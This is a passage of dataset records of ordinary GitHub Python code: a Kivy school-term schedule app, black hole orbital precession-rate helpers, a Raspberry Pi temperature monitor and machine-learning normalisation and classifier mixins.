'Aoki'\r\nelse:\r\n ans = 'Draw'\r\n\r\nprint(ans)\r\n","repo_name":"kazumasa-torii/atcoder","sub_path":"abc/249/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30720470822","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.label import Label\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.anchorlayout import AnchorLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.pagelayout import PageLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\nfrom kivy.properties import StringProperty\nfrom kivy.properties import BooleanProperty\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.graphics.vertex_instructions import Rectangle\n\nimport dataTerm1\nimport dataTerm2\nimport dataTerm3\n\n# -----------------------------------------BORDER----------------------------------------- #\n\n\n\n\nclass TermsWidget(BoxLayout):\n pass\nclass MainWindow(Screen):\n pass\nclass Term1Window(Screen):\n pass\nclass Term2Window(Screen):\n pass\nclass Term3Window(Screen):\n pass\nclass WindowManager(ScreenManager):\n pass\nclass mymain(App):\n pass\n\n# Term 1 Windows\nclass T1W1Window(Screen):\n topicY9=dataTerm1.Y9T1topic1\n topicY8=dataTerm1.Y8T1topic1\n topicY7=dataTerm1.Y7T1topic1\n topicY6=dataTerm1.Y6T1topic1\n hostY9=dataTerm1.Y9T1host1\n hostY8=dataTerm1.Y9T1host1\n hostY7=dataTerm1.Y9T1host1\n hostY6=dataTerm1.Y9T1host1\n presenterY9=dataTerm1.Y9T1presenter1\n presenterY8=dataTerm1.Y9T1presenter1\n presenterY7=dataTerm1.Y9T1presenter1\n presenterY6=dataTerm1.Y9T1presenter1\nclass T1W2Window(Screen):\n topicY9=dataTerm1.Y9T1topic2\n topicY8=dataTerm1.Y8T1topic2\n topicY7=dataTerm1.Y7T1topic2\n topicY6=dataTerm1.Y6T1topic2\n hostY9=dataTerm1.Y9T1host2\n hostY8=dataTerm1.Y9T1host2\n hostY7=dataTerm1.Y9T1host2\n hostY6=dataTerm1.Y9T1host2\n presenterY9=dataTerm1.Y9T1presenter2\n presenterY8=dataTerm1.Y9T1presenter2\n presenterY7=dataTerm1.Y9T1presenter2\n presenterY6=dataTerm1.Y9T1presenter2\nclass T1W3Window(Screen):\n topicY9=dataTerm1.Y9T1topic3\n topicY8=dataTerm1.Y8T1topic3\n topicY7=dataTerm1.Y7T1topic3\n topicY6=dataTerm1.Y6T1topic3\n hostY9=dataTerm1.Y9T1host3\n hostY8=dataTerm1.Y9T1host3\n hostY7=dataTerm1.Y9T1host3\n hostY6=dataTerm1.Y9T1host3\n presenterY9=dataTerm1.Y9T1presenter3\n presenterY8=dataTerm1.Y9T1presenter3\n presenterY7=dataTerm1.Y9T1presenter3\n presenterY6=dataTerm1.Y9T1presenter3\nclass T1W4Window(Screen):\n topicY9=dataTerm1.Y9T1topic4\n topicY8=dataTerm1.Y8T1topic4\n topicY7=dataTerm1.Y7T1topic4\n topicY6=dataTerm1.Y6T1topic4\n hostY9=dataTerm1.Y9T1host4\n hostY8=dataTerm1.Y9T1host4\n hostY7=dataTerm1.Y9T1host4\n hostY6=dataTerm1.Y9T1host4\n presenterY9=dataTerm1.Y9T1presenter4\n presenterY8=dataTerm1.Y9T1presenter4\n presenterY7=dataTerm1.Y9T1presenter4\n presenterY6=dataTerm1.Y9T1presenter4\nclass T1W5Window(Screen):\n topicY9=dataTerm1.Y9T1topic5\n topicY8=dataTerm1.Y8T1topic5\n topicY7=dataTerm1.Y7T1topic5\n topicY6=dataTerm1.Y6T1topic5\n hostY9=dataTerm1.Y9T1host5\n hostY8=dataTerm1.Y9T1host5\n hostY7=dataTerm1.Y9T1host5\n hostY6=dataTerm1.Y9T1host5\n presenterY9=dataTerm1.Y9T1presenter5\n presenterY8=dataTerm1.Y9T1presenter5\n presenterY7=dataTerm1.Y9T1presenter5\n presenterY6=dataTerm1.Y9T1presenter5\nclass T1W6Window(Screen):\n topicY9=dataTerm1.Y9T1topic6\n topicY8=dataTerm1.Y8T1topic6\n topicY7=dataTerm1.Y7T1topic6\n topicY6=dataTerm1.Y6T1topic6\n hostY9=dataTerm1.Y9T1host6\n hostY8=dataTerm1.Y9T1host6\n hostY7=dataTerm1.Y9T1host6\n hostY6=dataTerm1.Y9T1host6\n presenterY9=dataTerm1.Y9T1presenter6\n presenterY8=dataTerm1.Y9T1presenter6\n presenterY7=dataTerm1.Y9T1presenter6\n presenterY6=dataTerm1.Y9T1presenter6\nclass T1W7Window(Screen):\n topicY9=dataTerm1.Y9T1topic7\n topicY8=dataTerm1.Y8T1topic7\n topicY7=dataTerm1.Y7T1topic7\n topicY6=dataTerm1.Y6T1topic7\n hostY9=dataTerm1.Y9T1host7\n hostY8=dataTerm1.Y9T1host7\n hostY7=dataTerm1.Y9T1host7\n hostY6=dataTerm1.Y9T1host7\n presenterY9=dataTerm1.Y9T1presenter7\n presenterY8=dataTerm1.Y9T1presenter7\n presenterY7=dataTerm1.Y9T1presenter7\n presenterY6=dataTerm1.Y9T1presenter7\nclass T1W8Window(Screen):\n topicY9=dataTerm1.Y9T1topic8\n topicY8=dataTerm1.Y8T1topic8\n topicY7=dataTerm1.Y7T1topic8\n topicY6=dataTerm1.Y6T1topic8\n hostY9=dataTerm1.Y9T1host8\n hostY8=dataTerm1.Y9T1host8\n hostY7=dataTerm1.Y9T1host8\n hostY6=dataTerm1.Y9T1host8\n presenterY9=dataTerm1.Y9T1presenter8\n presenterY8=dataTerm1.Y9T1presenter8\n presenterY7=dataTerm1.Y9T1presenter8\n presenterY6=dataTerm1.Y9T1presenter8\nclass T1W9Window(Screen):\n topicY9=dataTerm1.Y9T1topic9\n topicY8=dataTerm1.Y8T1topic9\n topicY7=dataTerm1.Y7T1topic9\n topicY6=dataTerm1.Y6T1topic9\n hostY9=dataTerm1.Y9T1host9\n hostY8=dataTerm1.Y9T1host9\n hostY7=dataTerm1.Y9T1host9\n hostY6=dataTerm1.Y9T1host9\n presenterY9=dataTerm1.Y9T1presenter9\n presenterY8=dataTerm1.Y9T1presenter9\n presenterY7=dataTerm1.Y9T1presenter9\n presenterY6=dataTerm1.Y9T1presenter9\nclass T1W10Window(Screen):\n topicY9=dataTerm1.Y9T1topic10\n topicY8=dataTerm1.Y8T1topic10\n topicY7=dataTerm1.Y7T1topic10\n topicY6=dataTerm1.Y6T1topic10\n hostY9=dataTerm1.Y9T1host10\n hostY8=dataTerm1.Y9T1host10\n hostY7=dataTerm1.Y9T1host10\n hostY6=dataTerm1.Y9T1host10\n presenterY9=dataTerm1.Y9T1presenter10\n presenterY8=dataTerm1.Y9T1presenter10\n presenterY7=dataTerm1.Y9T1presenter10\n presenterY6=dataTerm1.Y9T1presenter10\nclass T1W11Window(Screen):\n topicY9=dataTerm1.Y9T1topic11\n topicY8=dataTerm1.Y8T1topic11\n topicY7=dataTerm1.Y7T1topic11\n topicY6=dataTerm1.Y6T1topic11\n hostY9=dataTerm1.Y9T1host11\n hostY8=dataTerm1.Y9T1host11\n hostY7=dataTerm1.Y9T1host11\n hostY6=dataTerm1.Y9T1host11\n presenterY9=dataTerm1.Y9T1presenter11\n presenterY8=dataTerm1.Y9T1presenter11\n presenterY7=dataTerm1.Y9T1presenter11\n presenterY6=dataTerm1.Y9T1presenter11\nclass T1W12Window(Screen):\n topicY9=dataTerm1.Y9T1topic12\n topicY8=dataTerm1.Y8T1topic12\n topicY7=dataTerm1.Y7T1topic12\n topicY6=dataTerm1.Y6T1topic12\n hostY9=dataTerm1.Y9T1host12\n hostY8=dataTerm1.Y9T1host12\n hostY7=dataTerm1.Y9T1host12\n hostY6=dataTerm1.Y9T1host12\n presenterY9=dataTerm1.Y9T1presenter12\n presenterY8=dataTerm1.Y9T1presenter12\n presenterY7=dataTerm1.Y9T1presenter12\n presenterY6=dataTerm1.Y9T1presenter12\nclass T1W13Window(Screen):\n topicY9=dataTerm1.Y9T1topic13\n topicY8=dataTerm1.Y8T1topic13\n topicY7=dataTerm1.Y7T1topic13\n topicY6=dataTerm1.Y6T1topic13\n hostY9=dataTerm1.Y9T1host13\n hostY8=dataTerm1.Y9T1host13\n hostY7=dataTerm1.Y9T1host13\n hostY6=dataTerm1.Y9T1host13\n presenterY9=dataTerm1.Y9T1presenter13\n presenterY8=dataTerm1.Y9T1presenter13\n presenterY7=dataTerm1.Y9T1presenter13\n presenterY6=dataTerm1.Y9T1presenter13\nclass T1W14Window(Screen):\n topicY9=dataTerm1.Y9T1topic14\n topicY8=dataTerm1.Y8T1topic14\n topicY7=dataTerm1.Y7T1topic14\n topicY6=dataTerm1.Y6T1topic14\n hostY9=dataTerm1.Y9T1host14\n hostY8=dataTerm1.Y9T1host14\n hostY7=dataTerm1.Y9T1host14\n hostY6=dataTerm1.Y9T1host14\n presenterY9=dataTerm1.Y9T1presenter14\n presenterY8=dataTerm1.Y9T1presenter14\n presenterY7=dataTerm1.Y9T1presenter14\n presenterY6=dataTerm1.Y9T1presenter14\n\n# Term 2 Windows\nclass T2W1Window(Screen):\n topicY9=dataTerm2.Y9T2topic1\n topicY8=dataTerm2.Y8T2topic1\n topicY7=dataTerm2.Y7T2topic1\n topicY6=dataTerm2.Y6T2topic1\n hostY9=dataTerm2.Y9T2host1\n hostY8=dataTerm2.Y9T2host1\n hostY7=dataTerm2.Y9T2host1\n hostY6=dataTerm2.Y9T2host1\n presenterY9=dataTerm2.Y9T2presenter1\n presenterY8=dataTerm2.Y9T2presenter1\n presenterY7=dataTerm2.Y9T2presenter1\n presenterY6=dataTerm2.Y9T2presenter1\nclass T2W2Window(Screen):\n topicY9=dataTerm2.Y9T2topic2\n topicY8=dataTerm2.Y8T2topic2\n topicY7=dataTerm2.Y7T2topic2\n topicY6=dataTerm2.Y6T2topic2\n hostY9=dataTerm2.Y9T2host2\n hostY8=dataTerm2.Y9T2host2\n hostY7=dataTerm2.Y9T2host2\n hostY6=dataTerm2.Y9T2host2\n presenterY9=dataTerm2.Y9T2presenter2\n presenterY8=dataTerm2.Y9T2presenter2\n presenterY7=dataTerm2.Y9T2presenter2\n presenterY6=dataTerm2.Y9T2presenter2\nclass T2W3Window(Screen):\n topicY9=dataTerm2.Y9T2topic3\n topicY8=dataTerm2.Y8T2topic3\n topicY7=dataTerm2.Y7T2topic3\n topicY6=dataTerm2.Y6T2topic3\n hostY9=dataTerm2.Y9T2host3\n hostY8=dataTerm2.Y9T2host3\n hostY7=dataTerm2.Y9T2host3\n hostY6=dataTerm2.Y9T2host3\n presenterY9=dataTerm2.Y9T2presenter3\n presenterY8=dataTerm2.Y9T2presenter3\n presenterY7=dataTerm2.Y9T2presenter3\n presenterY6=dataTerm2.Y9T2presenter3\nclass T2W4Window(Screen): \n topicY9=dataTerm2.Y9T2topic4\n topicY8=dataTerm2.Y8T2topic4\n topicY7=dataTerm2.Y7T2topic4\n topicY6=dataTerm2.Y6T2topic4\n hostY9=dataTerm2.Y9T2host4\n hostY8=dataTerm2.Y9T2host4\n hostY7=dataTerm2.Y9T2host4\n hostY6=dataTerm2.Y9T2host4\n presenterY9=dataTerm2.Y9T2presenter4\n presenterY8=dataTerm2.Y9T2presenter4\n presenterY7=dataTerm2.Y9T2presenter4\n presenterY6=dataTerm2.Y9T2presenter4\nclass T2W5Window(Screen):\n topicY9=dataTerm2.Y9T2topic5\n topicY8=dataTerm2.Y8T2topic5\n topicY7=dataTerm2.Y7T2topic5\n topicY6=dataTerm2.Y6T2topic5\n hostY9=dataTerm2.Y9T2host5\n hostY8=dataTerm2.Y9T2host5\n hostY7=dataTerm2.Y9T2host5\n hostY6=dataTerm2.Y9T2host5\n presenterY9=dataTerm2.Y9T2presenter5\n presenterY8=dataTerm2.Y9T2presenter5\n presenterY7=dataTerm2.Y9T2presenter5\n presenterY6=dataTerm2.Y9T2presenter5\nclass T2W6Window(Screen):\n topicY9=dataTerm2.Y9T2topic6\n topicY8=dataTerm2.Y8T2topic6\n topicY7=dataTerm2.Y7T2topic6\n topicY6=dataTerm2.Y6T2topic6\n hostY9=dataTerm2.Y9T2host6\n hostY8=dataTerm2.Y9T2host6\n hostY7=dataTerm2.Y9T2host6\n hostY6=dataTerm2.Y9T2host6\n presenterY9=dataTerm2.Y9T2presenter6\n presenterY8=dataTerm2.Y9T2presenter6\n presenterY7=dataTerm2.Y9T2presenter6\n presenterY6=dataTerm2.Y9T2presenter6\nclass T2W7Window(Screen):\n topicY9=dataTerm2.Y9T2topic7\n topicY8=dataTerm2.Y8T2topic7\n topicY7=dataTerm2.Y7T2topic7\n topicY6=dataTerm2.Y6T2topic7\n hostY9=dataTerm2.Y9T2host7\n hostY8=dataTerm2.Y9T2host7\n hostY7=dataTerm2.Y9T2host7\n hostY6=dataTerm2.Y9T2host7\n presenterY9=dataTerm2.Y9T2presenter7\n presenterY8=dataTerm2.Y9T2presenter7\n presenterY7=dataTerm2.Y9T2presenter7\n presenterY6=dataTerm2.Y9T2presenter7\nclass T2W8Window(Screen):\n topicY9=dataTerm2.Y9T2topic8\n topicY8=dataTerm2.Y8T2topic8\n topicY7=dataTerm2.Y7T2topic8\n topicY6=dataTerm2.Y6T2topic8\n hostY9=dataTerm2.Y9T2host8\n hostY8=dataTerm2.Y9T2host8\n hostY7=dataTerm2.Y9T2host8\n hostY6=dataTerm2.Y9T2host8\n presenterY9=dataTerm2.Y9T2presenter8\n presenterY8=dataTerm2.Y9T2presenter8\n presenterY7=dataTerm2.Y9T2presenter8\n presenterY6=dataTerm2.Y9T2presenter8\nclass T2W9Window(Screen):\n topicY9=dataTerm2.Y9T2topic9\n topicY8=dataTerm2.Y8T2topic9\n topicY7=dataTerm2.Y7T2topic9\n topicY6=dataTerm2.Y6T2topic9\n hostY9=dataTerm2.Y9T2host9\n hostY8=dataTerm2.Y9T2host9\n hostY7=dataTerm2.Y9T2host9\n hostY6=dataTerm2.Y9T2host9\n presenterY9=dataTerm2.Y9T2presenter9\n presenterY8=dataTerm2.Y9T2presenter9\n presenterY7=dataTerm2.Y9T2presenter9\n presenterY6=dataTerm2.Y9T2presenter9\nclass T2W10Window(Screen):\n topicY9=dataTerm2.Y9T2topic10\n topicY8=dataTerm2.Y8T2topic10\n topicY7=dataTerm2.Y7T2topic10\n topicY6=dataTerm2.Y6T2topic10\n hostY9=dataTerm2.Y9T2host10\n hostY8=dataTerm2.Y9T2host10\n hostY7=dataTerm2.Y9T2host10\n hostY6=dataTerm2.Y9T2host10\n presenterY9=dataTerm2.Y9T2presenter10\n presenterY8=dataTerm2.Y9T2presenter10\n presenterY7=dataTerm2.Y9T2presenter10\n presenterY6=dataTerm2.Y9T2presenter10\nclass T2W11Window(Screen):\n topicY9=dataTerm2.Y9T2topic11\n topicY8=dataTerm2.Y8T2topic11\n topicY7=dataTerm2.Y7T2topic11\n topicY6=dataTerm2.Y6T2topic11\n hostY9=dataTerm2.Y9T2host11\n hostY8=dataTerm2.Y9T2host11\n hostY7=dataTerm2.Y9T2host11\n hostY6=dataTerm2.Y9T2host11\n presenterY9=dataTerm2.Y9T2presenter11\n presenterY8=dataTerm2.Y9T2presenter11\n presenterY7=dataTerm2.Y9T2presenter11\n presenterY6=dataTerm2.Y9T2presenter11\nclass T2W12Window(Screen):\n topicY9=dataTerm2.Y9T2topic12\n topicY8=dataTerm2.Y8T2topic12\n topicY7=dataTerm2.Y7T2topic12\n topicY6=dataTerm2.Y6T2topic12\n hostY9=dataTerm2.Y9T2host12\n hostY8=dataTerm2.Y9T2host12\n hostY7=dataTerm2.Y9T2host12\n hostY6=dataTerm2.Y9T2host12\n presenterY9=dataTerm2.Y9T2presenter12\n presenterY8=dataTerm2.Y9T2presenter12\n presenterY7=dataTerm2.Y9T2presenter12\n presenterY6=dataTerm2.Y9T2presenter12\n# Term 3 Windows\nclass T3W1Window(Screen):\n topicY9=dataTerm3.Y9T3topic1\n topicY8=dataTerm3.Y8T3topic1\n topicY7=dataTerm3.Y7T3topic1\n topicY6=dataTerm3.Y6T3topic1\n hostY9=dataTerm3.Y9T3host1\n hostY8=dataTerm3.Y9T3host1\n hostY7=dataTerm3.Y9T3host1\n hostY6=dataTerm3.Y9T3host1\n presenterY9=dataTerm3.Y9T3presenter1\n presenterY8=dataTerm3.Y9T3presenter1\n presenterY7=dataTerm3.Y9T3presenter1\n presenterY6=dataTerm3.Y9T3presenter1\nclass T3W2Window(Screen):\n topicY9=dataTerm3.Y9T3topic2\n topicY8=dataTerm3.Y8T3topic2\n topicY7=dataTerm3.Y7T3topic2\n topicY6=dataTerm3.Y6T3topic2\n hostY9=dataTerm3.Y9T3host2\n hostY8=dataTerm3.Y9T3host2\n hostY7=dataTerm3.Y9T3host2\n hostY6=dataTerm3.Y9T3host2\n presenterY9=dataTerm3.Y9T3presenter2\n presenterY8=dataTerm3.Y9T3presenter2\n presenterY7=dataTerm3.Y9T3presenter2\n presenterY6=dataTerm3.Y9T3presenter2\nclass T3W3Window(Screen):\n topicY9=dataTerm3.Y9T3topic3\n topicY8=dataTerm3.Y8T3topic3\n topicY7=dataTerm3.Y7T3topic3\n topicY6=dataTerm3.Y6T3topic3\n hostY9=dataTerm3.Y9T3host3\n hostY8=dataTerm3.Y9T3host3\n hostY7=dataTerm3.Y9T3host3\n hostY6=dataTerm3.Y9T3host3\n presenterY9=dataTerm3.Y9T3presenter3\n presenterY8=dataTerm3.Y9T3presenter3\n presenterY7=dataTerm3.Y9T3presenter3\n presenterY6=dataTerm3.Y9T3presenter3\nclass T3W4Window(Screen):\n topicY9=dataTerm3.Y9T3topic4\n topicY8=dataTerm3.Y8T3topic4\n topicY7=dataTerm3.Y7T3topic4\n topicY6=dataTerm3.Y6T3topic4\n hostY9=dataTerm3.Y9T3host4\n hostY8=dataTerm3.Y9T3host4\n hostY7=dataTerm3.Y9T3host4\n hostY6=dataTerm3.Y9T3host4\n presenterY9=dataTerm3.Y9T3presenter4\n presenterY8=dataTerm3.Y9T3presenter4\n presenterY7=dataTerm3.Y9T3presenter4\n presenterY6=dataTerm3.Y9T3presenter4\nclass T3W5Window(Screen):\n topicY9=dataTerm3.Y9T3topic5\n topicY8=dataTerm3.Y8T3topic5\n topicY7=dataTerm3.Y7T3topic5\n topicY6=dataTerm3.Y6T3topic5\n hostY9=dataTerm3.Y9T3host5\n hostY8=dataTerm3.Y9T3host5\n hostY7=dataTerm3.Y9T3host5\n hostY6=dataTerm3.Y9T3host5\n presenterY9=dataTerm3.Y9T3presenter5\n presenterY8=dataTerm3.Y9T3presenter5\n presenterY7=dataTerm3.Y9T3presenter5\n presenterY6=dataTerm3.Y9T3presenter5\nclass T3W6Window(Screen):\n topicY9=dataTerm3.Y9T3topic6\n topicY8=dataTerm3.Y8T3topic6\n topicY7=dataTerm3.Y7T3topic6\n topicY6=dataTerm3.Y6T3topic6\n hostY9=dataTerm3.Y9T3host6\n hostY8=dataTerm3.Y9T3host6\n hostY7=dataTerm3.Y9T3host6\n hostY6=dataTerm3.Y9T3host6\n presenterY9=dataTerm3.Y9T3presenter6\n presenterY8=dataTerm3.Y9T3presenter6\n presenterY7=dataTerm3.Y9T3presenter6\n presenterY6=dataTerm3.Y9T3presenter6\nclass T3W7Window(Screen):\n topicY9=dataTerm3.Y9T3topic7\n topicY8=dataTerm3.Y8T3topic7\n topicY7=dataTerm3.Y7T3topic7\n topicY6=dataTerm3.Y6T3topic7\n hostY9=dataTerm3.Y9T3host7\n hostY8=dataTerm3.Y9T3host7\n hostY7=dataTerm3.Y9T3host7\n hostY6=dataTerm3.Y9T3host7\n presenterY9=dataTerm3.Y9T3presenter7\n presenterY8=dataTerm3.Y9T3presenter7\n presenterY7=dataTerm3.Y9T3presenter7\n presenterY6=dataTerm3.Y9T3presenter7\nclass T3W8Window(Screen):\n topicY9=dataTerm3.Y9T3topic8\n topicY8=dataTerm3.Y8T3topic8\n topicY7=dataTerm3.Y7T3topic8\n topicY6=dataTerm3.Y6T3topic8\n hostY9=dataTerm3.Y9T3host8\n hostY8=dataTerm3.Y9T3host8\n hostY7=dataTerm3.Y9T3host8\n hostY6=dataTerm3.Y9T3host8\n presenterY9=dataTerm3.Y9T3presenter8\n presenterY8=dataTerm3.Y9T3presenter8\n presenterY7=dataTerm3.Y9T3presenter8\n presenterY6=dataTerm3.Y9T3presenter8\nclass T3W9Window(Screen):\n topicY9=dataTerm3.Y9T3topic9\n topicY8=dataTerm3.Y8T3topic9\n topicY7=dataTerm3.Y7T3topic9\n topicY6=dataTerm3.Y6T3topic9\n hostY9=dataTerm3.Y9T3host9\n hostY8=dataTerm3.Y9T3host9\n hostY7=dataTerm3.Y9T3host9\n hostY6=dataTerm3.Y9T3host9\n presenterY9=dataTerm3.Y9T3presenter9\n presenterY8=dataTerm3.Y9T3presenter9\n presenterY7=dataTerm3.Y9T3presenter9\n presenterY6=dataTerm3.Y9T3presenter9\nclass T3W10Window(Screen):\n topicY9=dataTerm3.Y9T3topic10\n topicY8=dataTerm3.Y8T3topic10\n topicY7=dataTerm3.Y7T3topic10\n topicY6=dataTerm3.Y6T3topic10\n hostY9=dataTerm3.Y9T3host10\n hostY8=dataTerm3.Y9T3host10\n hostY7=dataTerm3.Y9T3host10\n hostY6=dataTerm3.Y9T3host10\n presenterY9=dataTerm3.Y9T3presenter10\n presenterY8=dataTerm3.Y9T3presenter10\n presenterY7=dataTerm3.Y9T3presenter10\n presenterY6=dataTerm3.Y9T3presenter10\nclass T3W11Window(Screen):\n topicY9=dataTerm3.Y9T3topic11\n topicY8=dataTerm3.Y8T3topic11\n topicY7=dataTerm3.Y7T3topic11\n topicY6=dataTerm3.Y6T3topic11\n hostY9=dataTerm3.Y9T3host11\n hostY8=dataTerm3.Y9T3host11\n hostY7=dataTerm3.Y9T3host11\n hostY6=dataTerm3.Y9T3host11\n presenterY9=dataTerm3.Y9T3presenter11\n presenterY8=dataTerm3.Y9T3presenter11\n presenterY7=dataTerm3.Y9T3presenter11\n presenterY6=dataTerm3.Y9T3presenter11\nclass T3W12Window(Screen):\n topicY9=dataTerm3.Y9T3topic12\n topicY8=dataTerm3.Y8T3topic12\n topicY7=dataTerm3.Y7T3topic12\n topicY6=dataTerm3.Y6T3topic12\n hostY9=dataTerm3.Y9T3host12\n hostY8=dataTerm3.Y9T3host12\n hostY7=dataTerm3.Y9T3host12\n hostY6=dataTerm3.Y9T3host12\n presenterY9=dataTerm3.Y9T3presenter12\n presenterY8=dataTerm3.Y9T3presenter12\n presenterY7=dataTerm3.Y9T3presenter12\n presenterY6=dataTerm3.Y9T3presenter12\n\n\n\n\nkv = Builder.load_file(\"mymain.kv\")\n\n\nclass MyMainApp(App):\n def build(self):\n return kv\nif __name__ == \"__main__\":\n MyMainApp().run()\n\n\n","repo_name":"MyGemsUsername/Kivy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25539288717","text":"import numpy as np\nimport cPickle as pickle\nfrom scipy.interpolate import UnivariateSpline\nimport bbh_processing.hfile_tools as hfile\nimport bbh_processing.peak_finders as peak\nimport bbh_processing.equatorial_freq_methods as eqfreq\nimport bbh_processing.unwrap as unwrap\nimport matplotlib.pyplot as plt\n\ndef krph(time, data, N, Niter=1, trim=True, minidx=200):\n ph_all = omega_phi_sliding(time, data, N, Niter=Niter, trim=trim,\n minidx=minidx, joined=True)\n r_all = omega_r_sliding(time, data, N, Niter=Niter, trim=trim,\n minidx=minidx, joined=True)\n k_all = r_all[:, 1] / ph_all[:, 1] \n return k_all\n\ndef ks_equatorial(omtime, omdata, N, minidx=200):\n\n omph = eqfreq.omega_phi_sliding(omtime, omdata, N, minidx=minidx)\n omr = eqfreq.omega_r_sliding(omtime, omdata, N, minidx=minidx)\n pt, pv = peak.conservative_peaks(omtime, omdata, minidx=minidx)\n tt, tv = peak.conservative_peaks(omtime, omdata, minidx=minidx, pktype=\"trough\")\n ecc = eqfreq.ecc_sqrt(pt, pv, tt, tv, omph[:, 0])\n krph = omr[:, 1] / omph[:, 1]\n outdict = {\n \"time\": omph[:, 0], \"ecc\": ecc,\n \"omph\": omph[:, 1], \"omr\": omr[:, 1], \n \"krph\": krph}\n return outdict\n\ndef ks_inclined(omtime, omdata, thtime, thdata, N, minidx=200):\n pt, pv = peak.conservative_peaks(omtime, omdata, minidx=minidx)\n tt, tv = peak.conservative_peaks(omtime, omdata, minidx=minidx, pktype=\"trough\")\n omph = eqfreq.omega_phi_from_peaks(omtime, omdata, pt, pv, N)\n omr = eqfreq.omega_r_from_peaks(omtime, omdata, pt, N)\n omth = unwrap.omega_theta_from_peaks(thtime, thdata, pt, N=1)\n ecc = eqfreq.ecc_sqrt(pt, pv, tt, tv, omph[:, 0])\n krph = omr[:, 1] / omph[:, 1]\n krth = omr[:, 1] / omth[:, 1]\n kthph = omth[:, 1] / omph[:, 1]\n \n outdict = {\n \"time\": omph[:, 0], \"ecc\": ecc,\n \"omph\": omph[:, 1], \"omr\": omr[:, 1], \"omth\": omth[:, 1],\n \"krph\": krph, \"krth\": krth, \"kthph\": kthph}\n return outdict\n","repo_name":"alewis/bbh_processing","sub_path":"bbh_processing/precession_rates.py","file_name":"precession_rates.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36743020208","text":"#This Code was taken from this website to test the temperature of the Raspberry pi Board:\n#https://medium.com/@kevalpatel2106/monitor-the-core-temperature-of-your-raspberry-pi-3ddfdf82989f\n\nimport os\nimport time\n\ndef measure_temp():\n temp = os.popen(\"vcgencmd measure_temp\").readline()\n return (temp.replace(\"temp=\",\"\"))\n\nwhile True:\n print(measure_temp())\n time.sleep(1)\n","repo_name":"Hackling92/ThePotato","sub_path":"Test_Code/Capstone_Project_GK/Temperature Indicator/GOTHC_013_Rev 1.0 Board Temperature Test.py","file_name":"GOTHC_013_Rev 1.0 Board Temperature Test.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70180008121","text":"import numpy as np\n\nfrom typing import *\nfrom abc import abstractmethod\nfrom abc import ABC\n\nfrom ..misc.toolkit import Metrics\n\n\nclass StrMixin:\n @property\n def name(self):\n return getattr(self, \"_name\", \"\")\n\n @property\n def kwargs(self):\n return getattr(self, \"_kwargs\", {})\n\n def __str__(self):\n if not self.kwargs:\n kwarg_str = \"\"\n else:\n kwarg_str = \"\\n\".join(\n [\" \" * 2 + f\"{k} : {v}\" for k, v in self.kwargs.items()]\n )\n kwarg_str = f\"\\n{{\\n{kwarg_str}\\n}}\"\n return f\"{type(self).__name__}({self.name}){kwarg_str}\"\n\n __repr__ = __str__\n\n\nclass NormalizeMixin(ABC):\n @property\n def std_eps(self):\n return 1e-8\n\n @property\n def normalize_labels(self):\n return getattr(self, \"_normalize_labels\", False)\n\n def _initialize_statistics(self, x: np.ndarray, y: np.ndarray):\n self._x_mean, self._x_std = x.mean(0), x.std(0)\n self._x_normalized = self.normalize_x(x)\n if not self.normalize_labels:\n self._y_normalized = y\n else:\n self._y_mean, self._y_std = y.mean(0), y.std(0)\n self._y_normalized = self.normalize_y(y)\n\n def normalize_x(self, x: np.ndarray) -> np.ndarray:\n return (x - self._x_mean) / (self._x_std + self.std_eps)\n\n def normalize_y(self, y: np.ndarray) -> np.ndarray:\n return (y - self._y_mean) / (self._y_std + self.std_eps)\n\n def recover_y(self, y_normalized: np.ndarray, *, in_place: bool = True):\n if not self.normalize_labels:\n return y_normalized\n if not in_place:\n y_normalized = y_normalized.copy()\n y_normalized *= self._y_std\n y_normalized += self._y_mean\n return y_normalized\n\n @abstractmethod\n def _predict_normalized(self, x: np.ndarray) -> np.ndarray:\n pass\n\n def predict_raw(self, x: np.ndarray) -> np.ndarray:\n predictions = self._predict_normalized(self.normalize_x(x))\n self.recover_y(predictions)\n return predictions\n\n\nclass BinaryClassifierMixin(ABC):\n @property\n def threshold(self):\n return getattr(self, \"_binary_threshold\", 0.5)\n\n @property\n def binary_metric(self):\n return getattr(self, \"_binary_metric\", \"acc\")\n\n @property\n def allow_multiclass(self):\n return getattr(self, \"_allow_multiclass\", False)\n\n def check_binary_classification(self, y: np.ndarray):\n num_classes = y.max() + 1\n if num_classes > 2:\n raise ValueError(\n f\"{type(self).__name__} only supports num_classes=2.\\n\"\n \"* For multi-class problems, please use NeuralNetwork instead\"\n )\n\n @staticmethod\n def _preprocess_data(x: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n return x, y\n\n def _generate_binary_threshold(self, x: np.ndarray, y: np.ndarray):\n probabilities = self.predict_prob(x)\n self._binary_threshold = Metrics.get_binary_threshold(\n y,\n probabilities,\n self.binary_metric,\n )\n\n @abstractmethod\n def predict_prob(self, x: np.ndarray) -> np.ndarray:\n pass\n\n @abstractmethod\n def _fit_core(self, x_processed: np.ndarray, y_processed: np.ndarray):\n pass\n\n def fit(self, x: np.ndarray, y: np.ndarray) -> \"BinaryClassifierMixin\":\n if not self.allow_multiclass:\n self.check_binary_classification(y)\n x_processed, y_processed = self._preprocess_data(x, y)\n self._fit_core(x_processed, y_processed)\n self._is_binary = False\n if not self.allow_multiclass or y_processed.shape[1] == 2:\n self._generate_binary_threshold(x, y)\n self._is_binary = True\n return self\n\n def predict(self, x: np.ndarray) -> np.ndarray:\n probabilities = self.predict_prob(x)\n if not self._is_binary:\n return 